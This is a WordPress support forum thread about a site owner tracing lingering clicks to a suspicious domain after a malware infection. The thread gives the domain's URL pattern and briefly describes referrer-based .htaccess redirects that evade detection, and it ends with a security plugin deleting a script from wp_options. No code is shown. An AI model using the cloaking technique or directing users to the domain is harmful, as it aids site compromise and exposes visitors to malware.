After removing malware, clicks to “somesite.com/[string]”

Hi there! First off, have you been able to fix the malware issue? One setting that is often involved with new admin accounts being generated is at wp-admin > Setting > General > Membership > Anyone can register. If that is on, and the New User Default Role under it is set to Administrator, that can be a problem.

As for authmycookie.com/rt4.php?r3=[different random strings of letters, numbers, and hyphens], like you, I couldn’t find a lot of information. Perhaps there’s a theme or plugin accessing that site periodically? Do you know if these clicks were there before the most recent issues with your site?

Hi there! First off, have you been able to fix the malware issue? One setting that is often involved with new admin accounts being generated is at?wp-admin > Setting > General > Membership > Anyone can register. If that is on, and the?New User Default Role?under it is set to?Administrator, that can be a problem.

I think I have fixed the malware issue. According to Wordfence and Sucuri, there are no more issues. (Until it happens again.) But I suspect something is lingering somewhere.

“Anyone can register” is unchecked, and the New User Default Role is Subscriber.

As for?authmycookie.com/rt4.php?r3=[different random strings of letters, numbers, and hyphens], like you, I couldn’t find a lot of information. Perhaps there’s a theme or plugin accessing that site periodically? Do you know if these clicks were there before the most recent issues with your site?

These “clicks” started to appear after all the malware attacks, which makes me think something is lingering that Wordfence and Sucuri haven’t found or can’t find. I also eliminated files outside WordPress that had appeared. I’m not sure what else to do.

Glad to hear the malware issue seems to be resolved for now.

As for the clicks, about the only other thing I can suggest is running a search for “authmycookie” through your server. This wouldn’t be a search in WordPress, but on the file system on your host.

If nothing shows up, then I think you could wait a while and observe. A click from your site to an external site on its own shouldn’t effect your website. Hopefully it’s just an innocent residue from something, but now harmless.

As for the clicks, about the only other thing I can suggest is running a search for “authmycookie” through your server. This wouldn’t be a search in WordPress, but on the file system on your host.

I found this under?logs/slywy.com_443_access_log. I don’t know what it means.

61.22.214.128 – – [28/Nov/2024:18:46:09 -0700] “GET /?s=authmycookie HTTP/1.1” 200 73214

Oh, that is a record of me searching for the word “authmycookie” on your website a few hours ago. I used the search bar on your site, just to see if anything would show up. As expected, nothing came up.

If that is the only thing you found, then I think you can leave this as-is for the moment. Hopefully your site won’t have any more malware issues.

Yeah, I can’t think of anything else I can do with so little info available. I don’t want to be passing malware or whatever on to site visitors or inadvertently sending them somewhere that does. I did find this:

https://radar.cloudflare.com/scan/618138a9-30e2-4c77-9f2d-b2ebba91bdbe/summary

So I just spent ages combatting a fresh infection of some kind and it seems like I’ve been plucking away at this thing weeding out crap everywhere its like the second one of these things get pwned it just keeps getting worse some jackass decided it would be smart to turn off updates and not tell anyone. I would suggest check your .htacess file it may have a redirect in there that only happens when you’re referred by known referring agents like google or bing. I think the idea is this evades detection by not replacing the contents if you go in direct via your normal domain.

I would suggest check your .htacess file it may have a redirect in there that only happens when you’re referred by known referring agents like google or bing. I think the idea is this evades detection by not replacing the contents if you go in direct via your normal domain.

Good idea, but when I checked the .htaccess file there was nothing in there that would cause this (there was very little in there). I was hoping that was the answer too.

Okay, now I’ve installed and paid for MalCare, which said the site was hacked and reported:

Script?DELETED?in Table ‘wp_options’

I hope that does it . . .

I have not seen any clicks to the auth my cookie site today for the first time in a couple of weeks at least. Removal of the script may have done it. (I can’t tell what the script is intended to do. It’s a foreign language to me.)

MalCare seems to have taken care of this so am marking “resolved.”

@slywy Do you have any other details on what MalCare did? I’m facing your exact same issue. What plugin? What option stored the script? etc.

@slywy?Do you have any other details on what MalCare did? I’m facing your exact same issue. What plugin? What option stored the script? etc.

It said: Script?DELETED?in Table ‘wp_options’

I have the script itself but not sure it’s a good idea to post it?

@slywy
The website is blacklisted so you may need to work on getting it removed from the blocklists. Thank you
https://www.virustotal.com/gui/url/11e807919d33eca7c2435c4147aeee3b6ecead591ef18032caf502aaeb529426?

@moeo I’m not sure what I could do to get it removed. It doesn’t appear to be affected on, say, Google or Bing.